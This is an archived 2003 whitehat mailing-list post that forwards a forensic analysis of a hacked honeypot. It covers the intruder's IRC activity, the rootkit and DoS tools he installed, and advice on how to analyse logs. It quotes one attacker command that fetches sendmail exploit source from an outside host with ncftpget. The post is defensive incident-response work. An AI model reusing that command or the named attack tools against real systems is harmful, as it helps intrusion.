Fwd: Re: honeypot hacked by romanians, requesting translator for IRC logs

"Mihai (Cop) Moldovanu" <[email protected]> Thu, 13 Mar 2003 11:38:04 +0200
Newsgroups gmane.org.user-groups.rlug.whitehat
Organization Tfm Group
Message-ID <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Forensic evidences + comentariile mele .

- ----------  Forwarded Message  ----------

Subject: Re: honeypot hacked by romanians, requesting translator for IRC logs
Date: Tuesday 11 March 2003 01:05
From: "Mihai Moldovanu" <[email protected]>
To: <[email protected]>

Hi again ,
let me tell you the first impressions.

> After re-analyzing these log files more I can't be sure there is
> actually a  botnet involved as this has been my first honeypot that's
> taken me on IRC.

No. i don't think it's a botnet. It's a single person that did the hack.
The channels from the irc logs are commonly used by many romanians .

#craiova is the channel where people from Craiova town ( a town in
south-east Romania ) meets. and since this is a common channel the
conversations
are usualy normal about girls , meetings  etc .
#hi-q - is a channel for music. hi-q is a romanian band .

> I would have liked to catch some more data from this hacker but snort
> started catching several signals of a mstream DDOS attack so I cut this
> hacker's line before he could cause too much damage.

The rootkit he installed is quite common. Adore , patched ssh , psybnc
are verry common in romanian script kiddies rootkits. But one thing
puzzels me. The sendmail exploit. This one is recent and not many
of them have it. if u saw he took the exploit from another site
(ncftpget 209.63.57.10 -u xhack.150m.com -p 123 . sxp.c)
And there is another thing . in the rootkit threre are several DOS
tools. And those tools are quite dangerous (vadim, sl and sl4 for example)

> If you're interested and think you may be able to help determine what
> exactly happened, the log files at the following location are all I've
> been  able to collect thus far:
> http://www.anuzis.net/pot2/
> Contained in the directory are the following files:
> commands.txt  = a log of the commands the hacker entered caught via bash
>  keystroke logging
> telnet.txt = restored telnet session the hacker made from the honeypot
> to  another host (as can be seen in commands.txt)
> irc.log1 = irc log files for the first few hours, heavily grepped to
> filter  out things like people joining/parting/quitting/channel mode
> changes/pings,  etc
>
>
> irc.log2 = irc logs picked up where the first patch left off, also
> heavilly  grepped to try to keep things relevant.

This is a mistake. When you analize a hacked hneypot don't filter anything .
Or the chances to miss something grows .
Let me show you: I read the log2.
the hacker said at one point that he will send some picture to another
guy. At this point it would be usefull to see his real IP addresss.
When they hack a server they usualy go to a "safe place" ex. another
previous hacked server and they hack from there. but the most common
mistake they make is that after they hack a server they enter on irc
using theirs real ip address so they can use DCC to send / receive files .

> From what I can tell it sounds like this hacker may have been fairly
> harmless, talking to some girl Laura about a few pictures which I think
> may  be on my honeypot. ie. poza2.jpg

Yes. He used this bnc to hide his real location. beside that, there were
pretty innocent discutions with his friends.

> Any insight you can get from the log files would be appreciated. I'm
> fairly  novice at interpreting IRC logs from honeypots.
> At first I
> thought the  #craiova channel may have been used for a botnet but after
> closer inspection  it seems it may not be. I can't tell what is being
> spoken there.

No. #craiova is a well knows undernet channel . i told you at the begining
of the mail what that channel means.

This are my first impressions. I will take a deeper look at the logs
tomorow ( it's 1 am here ) .

- --
Best regards,
C.E.O. TFM Group ,
Linux Division Romania
Mihai Moldovanu
- -------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+cFGB4LnCdzqLYWoRAleMAJ4/PBerSGPuJ+IHBaFnIkVkQtBrLgCfWVcK
LkhcNPyTVKW/R0jjNjxV2Ow=
=25FY
-----END PGP SIGNATURE-----

---
Pentru dezabonare, trimiteti mail la 
[email protected] cu subiectul 'unsubscribe whitehat'.
REGULI, arhive si alte informatii: http://www.lug.ro/mlist/